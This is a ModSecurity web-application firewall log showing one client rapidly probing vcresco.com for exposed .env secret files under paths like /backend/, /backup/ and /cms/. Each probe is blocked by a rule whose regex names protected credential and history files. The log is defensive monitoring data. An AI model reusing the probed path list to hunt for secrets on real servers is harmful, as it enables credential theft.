[Tue May 26 13:04:16.187320 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:43314] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/apps/.env"] [unique_id "ahVM-OjO_W1DqEcFHQ4HDwAAABs"]
[Tue May 26 13:04:16.228079 2026] [security2:error] [pid 470766:tid 470898] [client 195.178.110.199:43358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HEAAAAAI"]
[Tue May 26 13:04:16.233567 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:43254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HEwAAAAE"]
[Tue May 26 13:04:16.287609 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:43422] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HFQAAAEc"]
[Tue May 26 13:04:16.294220 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:43326] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HFgAAAFI"]
[Tue May 26 13:04:16.323246 2026] [security2:error] [pid 470766:tid 470911] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HHAAAAA8"]
[Tue May 26 13:04:16.330901 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:43384] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HHwAAAFI"]
[Tue May 26 13:04:16.376944 2026] [security2:error] [pid 470766:tid 470973] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HIwAAAE0"]
[Tue May 26 13:04:16.384438 2026] [security2:error] [pid 470766:tid 470972] [client 195.178.110.199:43300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/application/.env"] [unique_id "ahVM-OjO_W1DqEcFHQ4HJwAAAEw"]
[Tue May 26 13:04:16.416248 2026] [security2:error] [pid 470766:tid 471009] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HJgAAAHE"]
[Tue May 26 13:04:16.569313 2026] [security2:error] [pid 470766:tid 470963] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HMAAAAEM"]
[Tue May 26 13:04:16.573097 2026] [security2:error] [pid 470766:tid 470917] [client 195.178.110.199:43420] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HMQAAABU"]
[Tue May 26 13:04:16.581936 2026] [security2:error] [pid 470766:tid 470953] [client 195.178.110.199:43324] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HMgAAADk"]
[Tue May 26 13:04:16.608706 2026] [security2:error] [pid 470766:tid 470914] [client 195.178.110.199:43332] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HNAAAABI"]
[Tue May 26 13:04:16.654794 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HUgAAAH8"]
[Tue May 26 13:04:16.697752 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HWgAAAFQ"]
[Tue May 26 13:04:16.759714 2026] [security2:error] [pid 470766:tid 470909] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HXgAAAA0"]
[Tue May 26 13:04:16.762159 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:43324] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HXwAAAEA"]
[Tue May 26 13:04:16.792074 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HYgAAAEE"]
[Tue May 26 13:04:16.821219 2026] [security2:error] [pid 470766:tid 470927] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HZQAAAB8"]
[Tue May 26 13:04:16.858744 2026] [security2:error] [pid 470766:tid 470925] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HagAAAB0"]
[Tue May 26 13:04:16.865218 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:43420] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HbAAAABs"]
[Tue May 26 13:04:16.919932 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HcgAAAAA"]
[Tue May 26 13:04:16.965467 2026] [security2:error] [pid 470766:tid 470921] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HhQAAABk"]
[Tue May 26 13:04:16.971030 2026] [security2:error] [pid 470766:tid 470972] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HiAAAAEw"]
[Tue May 26 13:04:16.997686 2026] [security2:error] [pid 470766:tid 471022] [client 195.178.110.199:43384] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HiQAAAH4"]
[Tue May 26 13:04:17.007932 2026] [security2:error] [pid 470766:tid 470964] [client 195.178.110.199:43290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/back-api/.env"] [unique_id "ahVM-ejO_W1DqEcFHQ4HjwAAAEQ"]
[Tue May 26 13:04:17.016475 2026] [security2:error] [pid 470766:tid 470929] [client 195.178.110.199:43420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/back-end/.env"] [unique_id "ahVM-ejO_W1DqEcFHQ4HkAAAACE"]
[Tue May 26 13:04:17.025657 2026] [security2:error] [pid 470766:tid 470919] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HjAAAABc"]
[Tue May 26 13:04:17.075850 2026] [security2:error] [pid 470766:tid 470907] [client 195.178.110.199:43332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backend-api/.env"] [unique_id "ahVM-ejO_W1DqEcFHQ4HnAAAAAs"]
[Tue May 26 13:04:17.078005 2026] [security2:error] [pid 470766:tid 470993] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HUAAAAGE"]
[Tue May 26 13:04:17.087736 2026] [security2:error] [pid 470766:tid 470951] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HlwAAADc"]
[Tue May 26 13:04:17.088709 2026] [security2:error] [pid 470766:tid 470917] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HlgAAABU"]
[Tue May 26 13:04:17.098598 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HmwAAAH8"]
[Tue May 26 13:04:17.117167 2026] [security2:error] [pid 470766:tid 470904] [client 195.178.110.199:43422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backend/.env"] [unique_id "ahVM-ejO_W1DqEcFHQ4HnQAAAAg"]
[Tue May 26 13:04:17.177116 2026] [security2:error] [pid 470766:tid 470997] [client 195.178.110.199:43384] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HoQAAAGU"]
[Tue May 26 13:04:17.198016 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:43420] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HpQAAAEA"]
[Tue May 26 13:04:17.207005 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:43358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HpgAAAEE"]
[Tue May 26 13:04:17.237650 2026] [security2:error] [pid 470766:tid 471004] [client 195.178.110.199:45528] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HqQAAAGw"]
[Tue May 26 13:04:17.264998 2026] [security2:error] [pid 470766:tid 470941] [client 195.178.110.199:43300] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HsAAAAC0"]
[Tue May 26 13:04:17.270727 2026] [security2:error] [pid 470766:tid 470959] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HsQAAAD8"]
[Tue May 26 13:04:17.282127 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:45546] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HswAAAAE"]
[Tue May 26 13:04:17.352539 2026] [security2:error] [pid 470766:tid 470971] [client 195.178.110.199:43358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backup/.env"] [unique_id "ahVM-ejO_W1DqEcFHQ4HtgAAAEs"]
[Tue May 26 13:04:17.378247 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:43420] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HtQAAAGY"]
[Tue May 26 13:04:17.391223 2026] [security2:error] [pid 470766:tid 470939] [client 195.178.110.199:45528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/be/.env"] [unique_id "ahVM-ejO_W1DqEcFHQ4HtwAAACs"]
[Tue May 26 13:04:17.431798 2026] [security2:error] [pid 470766:tid 470934] [client 195.178.110.199:43332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/back/.env"] [unique_id "ahVM-ejO_W1DqEcFHQ4HuwAAACY"]
[Tue May 26 13:04:17.467518 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HvgAAABs"]
[Tue May 26 13:04:17.537715 2026] [security2:error] [pid 470766:tid 470918] [client 195.178.110.199:43384] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HwgAAABY"]
[Tue May 26 13:04:17.568394 2026] [security2:error] [pid 470766:tid 470985] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HxgAAAFk"]
[Tue May 26 13:04:17.654717 2026] [security2:error] [pid 470766:tid 471022] [client 195.178.110.199:45560] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4HzgAAAH4"]
[Tue May 26 13:04:17.663922 2026] [security2:error] [pid 470766:tid 470919] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4H0QAAABc"]
[Tue May 26 13:04:17.744756 2026] [security2:error] [pid 470766:tid 470953] [client 195.178.110.199:43290] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4H1wAAADk"]
[Tue May 26 13:04:17.837093 2026] [security2:error] [pid 470766:tid 470942] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4H9AAAAC4"]
[Tue May 26 13:04:17.900673 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4H-QAAAGk"]
[Tue May 26 13:04:17.925510 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4H_AAAAEk"]
[Tue May 26 13:04:17.942697 2026] [security2:error] [pid 470766:tid 470981] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4H_wAAAFU"]
[Tue May 26 13:04:17.990340 2026] [security2:error] [pid 470766:tid 471015] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4ICAAAAHc"]
[Tue May 26 13:04:18.030565 2026] [security2:error] [pid 470766:tid 470970] [client 195.178.110.199:45554] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ejO_W1DqEcFHQ4ICQAAAEo"]
[Tue May 26 13:04:18.047912 2026] [security2:error] [pid 470766:tid 470956] [client 195.178.110.199:43358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/cms/.env"] [unique_id "ahVM-ujO_W1DqEcFHQ4ICgAAADw"]
[Tue May 26 13:04:18.109958 2026] [security2:error] [pid 470766:tid 470898] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ujO_W1DqEcFHQ4IDQAAAAI"]
[Tue May 26 13:04:18.127329 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ujO_W1DqEcFHQ4IEAAAABs"]
[Tue May 26 13:04:18.132665 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ujO_W1DqEcFHQ4IEwAAAFI"]
[Tue May 26 13:04:18.172435 2026] [security2:error] [pid 470766:tid 470962] [client 195.178.110.199:45528] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-ujO_W1DqEcFHQ4IFwAAAEI"]
